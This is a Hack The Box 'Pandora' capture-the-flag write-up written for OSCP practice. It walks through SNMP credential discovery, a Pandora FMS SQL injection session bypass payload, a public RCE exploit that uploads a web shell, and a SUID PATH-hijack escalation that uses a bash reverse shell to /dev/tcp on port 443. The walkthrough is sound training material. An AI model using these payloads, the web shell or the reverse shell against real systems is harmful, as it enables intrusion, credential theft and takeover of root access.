Prep for OSCP — HTB [E] Pandora — Writeup
You can read the article from the medium also.
Pandora is an easy rated Linux machine. SNMP port is discovered by an unconventional nmap scan. When the SNMP service is examined, clear-text credentials are revealed. After loginning SSH with these credentials, privileges are horizontally escalated by chaining SQL injection and RCE vulnerabilities in a web interface that is running locally but not exposed externally. During the enumerations with the user matt, a binary file with the SUID bit set is found and privilege escalation is achieved by exploiting it with a PATH Injection attack.
Information Gathering
Starting with a nmap scan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
└─$ sudo nmap -sC -sV --open -oN nmap -vvv 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up, received reset ttl 63 (0.37s latency).
Scanned at 2024-05-30 10:40:38 EDT for 30s
Not shown: 997 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
| 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I lost a lot of time on the directory fuzzing part. I even tried virtual host fuzzing, scanning subdirectories fuzzing. But later, when I started a UDP nmap scan, everything fell into place.
1
2
3
4
5
6
7
└─$ sudo nmap -sU panda.htb -vvv
Nmap scan report for panda.htb (10.10.11.136)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-05-30 11:29:51 EDT for 1091s
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE REASON
161/udp open snmp udp-response ttl 63
Initial Foothold - daniel
After discovering that the SNMP port is open, let’s run the snmpwalk tool. We will try our luck with the public community which is default one.
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/htb/pandora]
└─$ snmpwalk -v2c -c public panda.htb
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.25.4.2.1.4.24186 = STRING: "/usr/bin/pandora_backup"
iso.3.6.1.2.1.25.4.2.1.5.816 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
After waiting a little while, we started to see these outputs.
daniel:HotelBabylon23: With these credentials we can try to log on via SSH./usr/bin/pandora/backup: Examining this binary should be our first priority when we enter the system.
Lateral Movement → matt
We logged into the target system via SSH using the daniel:HotelBabylon23 credentials we found from the SNMP output. The first thing I did was run linpeas.
1
2
3
4
5
6
7
8
9
daniel@pandora:~$ ./linpeas.sh
...
root 799 0.0 0.0 2608 548 ? Ss 16:02 0:00 _ /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
...
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
...
ServerName pandora.panda.htb
...
-rw-r--r-- 1 root root 14844 Mar 4 2020 /usr/share/php/DB/storage.php
I’ve taken notes above. Below are some of the attempts I’ve tried for mysql.
1
2
3
4
5
6
7
8
9
daniel@pandora:/$ mysql -h localhost -u daniel -p
Enter password:
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)
daniel@pandora:/$ mysql -h localhost -u matt -p
Enter password:
ERROR 1045 (28000): Access denied for user 'matt'@'localhost' (using password: YES)
daniel@pandora:/$ mysql -h localhost -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Let’s inspect the /usr/bin/host_check binary file and print its contents using cat.
1
2
3
4
5
6
7
8
9
10
ELF>�@:@8
@@@@h���}} ``�-�=�=`h�-�=�=����DDP�td▒"▒"▒"<<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNU�@_��3)mA^A_��H�H��
PandoraFMS host check utilityNow attempting to check PandoraFMS registered hosts.
Files will be saved to ~/.host_check/usr/bin/curl 'http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23' > ~/.host_check 2>/dev/nullHost check unsuccessful!
Please check your credentials.
Terminating program!Host check successful!
Terminating program!Ussage: ./host_check -u username -p password.Two arguments expected.����X����h���XM���������X���0zRx
...
▒@`�� ▒������o����o���o����o�=6FVf@@GCC: (Debian 10.2.1-6) 10.2.1 20210110��0 � �
...
I noticed that the application is making a request to http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23. I tried making the request myself using curl.
1
2
3
4
5
daniel@pandora:/var/www$ curl http://127.0.0.1/pandora_console/include/api.php?op=get&op2=all_agents&return_type=csv&other_mode=url_encode_separator_%7C&user=daniel&pass=HotelBabylon23[1] 18617
[2] 18618
[3] 18619
[4] 18620
[5] 18621
And got the output. Seems like there’s an interface published locally. When I listed the contents of the /var/www/pandora/pandora_console directory, SQL files appeared.
1
2
3
4
5
6
7
8
9
10
daniel@pandora:/var/www/pandora/pandora_console$ ls
ajax.php docker_entrypoint.sh index.php *pandoradb_data.sql*
attachment Dockerfile install.done *pandoradb.sql*
audit.log extensions mobile pandora_websocket_engine.service
AUTHORS extras operation tests
composer.json fonts pandora_console.log tools
composer.lock general pandora_console_logrotate_centos vendor
COPYING godmode pandora_console_logrotate_suse ws.php
DB_Dockerfile images pandora_console_logrotate_ubuntu
DEBIAN include pandora_console_upgrade
I thought of uploading these SQL files to my local MySQL server and accessing the data by running these SQL files.
1
2
3
4
5
6
7
8
9
10
11
MariaDB [(none)]> CREATE DATABASE pandoradb
-> ;
Query OK, 1 row affected (0.000 sec)
MariaDB [pandoradb]> source /home/kali/htb/pandora/pandoradb.sql
Query OK, 0 rows affected (0.003 sec)
...
MariaDB [pandoradb]> source /home/kali/htb/pandora/pandoradb_data.sql
Query OK, 1 row affected (0.001 sec)
...
However, when I attempted to list the data, most of it returned as empty sets. I found a column to get the application version.
1
2
3
4
5
6
7
8
9
10
11
MariaDB [pandoradb]> SELECT * FROM tconfig WHERE token = 'current_package_enterprise';
+-----------+----------------------------+-------+
| id_config | token | value |
+-----------+----------------------------+-------+
| 83 | current_package_enterprise | 742 |
+-----------+----------------------------+-------+
1 row in set (0.000 sec)
MariaDB [pandoradb]>
And when I typed pandora consolee 742 exploit into Google, I came across the following results.
Firstly, we will gain access to the panel by exploiting data with an unauthenticated SQL injection, and after that, we will execute commands with an authenticated RCE to obtain a shell.
First, let’s forward the target’s local port 80 to our local port 8080 using SSH port forwarding. This way, we’ll be able to use our tools on Kali.
1
└─$ ssh -N -L 0.0.0.0:8080:localhost:80 daniel@panda.htb
If we inspect the exploit source code, we can see that the vulnerability lies in the session_id parameter in chart_generator.php file.
Let’s run sqlmap and dump the tssessions_php table to retrieve the necessary session ID for logging into the system.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/htb/pandora]
└─$ sqlmap -u "http://127.0.0.1:8080/pandora_console/include/chart_generator.php?session_id=2" --dbms=mysql -T tsessions_php --dump
...
[13:21:35] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'
┌──(kali㉿kali)-[~/…/share/sqlmap/output/127.0.0.1]
└─$ ls
dump log session.sqlite target.txt
Let’s open the session.sqlite file using the DB Browser for SQLite application.
Let’s take the session we obtained based on the link https://sploitus.com/exploit?id=100B9151-5B50-532E-BF69-74864F32DB02 and place it in the following link, then send a GET request. After that, when we send a GET request to the pandora_console path, we will have logged into the system as an admin.
1
2
http://192.168.60.131:8080/pandora_console/include/chart_generator.php?session_id=6414945083776795218%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a
http://192.168.60.131:8080/pandora_console/
The reason for having the IP address 192.168.60.131 is because I’m accessing Kali VM from a Windows computer using NAT. The reason for doing this is because Firefox on Kali VM was lagging. You can access it from Windows by changing it to localhost on Kali or by finding out the IP address of the subnet you are connected to and accessing it the same way.
Here, I noticed that we can change the password directly without entering old password. So we will be able to exploit authenticated RCE.
Let’s download the https://www.exploit-db.com/exploits/50961 exploit and use with password that we change as pandora.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
└─$ python3 50961.py -t 127.0.0.1 8080 -u admin pandora
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\\| / / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\\____/_/|_/___/\\___/\\____/_/|_/____/....
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: admin
PASSWORD: pandora
WEBFILE: unicord.php
WEBSITE: <http://127.0.0.1:8080/pandora_console>
PHPSESS: 6r1hl4c84nvrtt7t7hdf0mn13g
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8080/pandora_console/images/unicord.php?cmd=whoami
Web shell has been uploaded.
1
2
3
┌──(kali㉿kali)-[~/htb/pandora]
└─$ curl http://127.0.0.1:8080/pandora_console/images/unicord.php?cmd=whoami
matt
Let’s try connecting via SSH with the user ‘matt’ by adding our own id_rsa.pub to /home/matt/.ssh/authorized_keys. Since I encountered encoding issues while doing this with curl, I decided to use Burp Suite.
And we are in.
1
2
3
└─$ ssh matt@panda.htb -i ~/.ssh/id_rsa
...
matt@pandora:~$ cat user.txt
Privilege Escalation
Before moving on to Linpeas, let’s print out the /usr/bin/pandora_backup file that we found during SNMP scanning. This file is set with the SUID bit, and if we can exploit and execute it, we can escalate privileges.
1
2
3
4
5
6
7
8
matt@pandora:~$ cat /usr/bin/pandora_backup
...
H�=�.�-����h�����.]�����{���UH��SH��������������މ������H
�=n�����H�=������H�=���������tH�=��d�����H�=��Q���H�=��E
����H�]���f.�AWL�=�+AVI��AUI��ATA��UH�-�+SL)�H������H��t�L��L�
�D��A��H��H9�u�H�[]A\\A]A^A_��H�H��PandoraFMS Backup UtilityNow attempting t
o backup PandoraFMS clienttar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/
pandora_console/*Backup failed!
Here, what caught my attention is tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*. Let’s first check if there’s anything related to the wildcard. For this, we are referring to the following article for assistance: Linux Privilege Escalation: Wildcards with tar
1
2
3
4
5
6
matt@pandora:/var/www/pandora/pandora_console$ echo "" > '--checkpoint=1'
matt@pandora:/var/www/pandora/pandora_console$ echo "" > '--checkpoint-action=exec=sh privesc.sh'
matt@pandora:/var/www/pandora/pandora_console$ echo 'bash -c "bash -i >& /dev/tcp/10.10.16.17/443 0>&1"' > privesc.sh
matt@pandora:/var/www/pandora/pandora_console$$ chmod +x privesc.sh
matt@pandora:/var/www/pandora/pandora_console$ /usr/bin/pandora_backup
Here, we want our tar command to reach this state.
1
tar dosya1 dosya2 ... --checkpoint=1 --checkpoint-action=exec=sh privesc.sh
However, the logic we applied during the trials didn’t work. Here, we can pay attention to one more thing: the file path for the tar command is not fully specified. In other words, if we place a folder in the PATH variable and make it run the tar file in that path, at the end of the day, the desired tar file will be executed.
For this, let’s rename the file privesc.h to tar and move it to the folder specified in the PATH. Then, let’s execute the file.
1
2
3
4
5
6
7
matt@pandora:/var/www/pandora/pandora_console$ export PATH=/home/matt:$PATH
matt@pandora:/var/www/pandora/pandora_console$ mv privesc.sh tar
matt@pandora:/var/www/pandora/pandora_console$ cp tar /home/matt/.
matt@pandora:/var/www/pandora/pandora_console$ cd /home/matt/.
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
And our shell is ready. Enjoy your meal.
Conclusions
Pandora machine, compared to others on Hackthebox, is relatively easy. What made it stand out was the freedom to try different approaches. There’s no fixed path to solve it, which made it feel myself more free.
I spent a lot of time reconning the machine. I hadn’t thought of doing a UDP scan, so I added it as a backup plan right away.